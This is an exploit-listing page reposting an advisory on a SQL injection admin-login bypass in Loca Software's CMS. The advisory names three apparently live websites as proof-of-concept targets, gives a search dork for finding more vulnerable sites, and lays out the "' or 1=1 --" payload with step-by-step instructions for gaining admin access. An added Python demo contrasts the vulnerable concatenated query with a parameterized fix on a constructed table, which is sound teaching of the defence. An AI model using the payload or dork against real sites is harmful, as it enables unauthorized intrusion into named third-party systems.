Loca Software - Sql Injection/Admin Panel Bypass

CVE: Not specified
Category: CWE-89
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Local
Date: 2024-02-03
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020019

Below is a copy:

TITLE: Loca Software - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: LocaSoftware
# Vulnerable URL: /cms/
# Dork: intext:"bu web sitesi LOCA YAZILIM BLM TEK. LTD. T."
# Vulnerability Type: SQL Bypass
# Severity: Critical
Vulnerability Description:
A critical SQL injection vulnerability has been identified in the admin panel login functionality of Loca Software's CMS, specifically within the /cms/ directory. The vulnerability allows an attacker to bypass authentication controls by injecting arbitrary SQL into the login query, resulting in unauthorized access to the admin panel.
Proof of Concept (PoC):
URLs:
- http://izmirsunnetmerkezi.com/cms/
- https://www.ozkankirtasiye.com.tr/cms/
- https://locapp.net/cms/
1. Visit the admin login page, typically located at: https://locapp.net/cms/
2. Input the following payload in the username and password fields:
' or 1=1 --
' or 1=1 --
3. Submit the form.
4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass.
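The root cause described above is a login query built by string concatenation, so a quote and an SQL comment in the username field rewrite the WHERE clause. The following is an added example, not code from the advisory or from Loca Software, that reproduces the flaw against a constructed in-memory SQLite table and places the corrected version beside it: a parameterized query plus a constant-time hash comparison done in application code, which leaves the same payload with no effect. The table layout, the user "admin", the sample password, and the unsalted SHA-256 storage are demo simplifications chosen here (a real system should use a salted, slow KDF such as PBKDF2 or Argon2); only the payload string itself comes from the advisory.

```python
import hashlib
import hmac
import sqlite3
from typing import Optional

# Payload quoted in the advisory (entered into the username field).
PAYLOAD = "' or 1=1 --"


def _hash_pw(password: str) -> str:
    # Demo simplification: unsalted SHA-256 so both login variants can share
    # one table. Production code should use a salted, slow KDF.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed demo table standing in for the CMS's real admin user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users ("
        "id INTEGER PRIMARY KEY, username TEXT UNIQUE NOT NULL, pw_hash TEXT NOT NULL)"
    )
    conn.execute(
        "INSERT INTO users (username, pw_hash) VALUES (?, ?)",
        ("admin", _hash_pw("correct horse battery staple")),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """CWE-89 pattern: user input is concatenated into the statement.

    With username = "' or 1=1 --" the query becomes
      SELECT ... WHERE username = '' or 1=1 --' AND pw_hash = '...'
    so the trailing password check is commented out and every row matches.
    """
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND pw_hash = '{_hash_pw(password)}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Hardened form: a bound parameter (the value can never become SQL syntax),
    and the password check is done in code with a constant-time comparison."""
    row = conn.execute(
        "SELECT username, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return None
    stored_name, stored_hash = row
    if not hmac.compare_digest(stored_hash, _hash_pw(password)):
        return None
    return stored_name


def demo() -> dict:
    """Run both variants against the advisory payload and a legitimate login."""
    return {
        "vulnerable_with_payload": login_vulnerable(make_db(), PAYLOAD, PAYLOAD),
        "safe_with_payload": login_safe(make_db(), PAYLOAD, PAYLOAD),
        "safe_with_real_credentials": login_safe(
            make_db(), "admin", "correct horse battery staple"
        ),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result!r}")
```

Running the block prints that the concatenating variant returns "admin" for the payload while the parameterized variant returns None, and that valid credentials still succeed. The point for remediation is that no input filtering is involved in the fix: the bound parameter is passed to the database separately from the statement text, so it is never parsed as SQL.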
# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.
Contact
Telegram: @rootninext

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.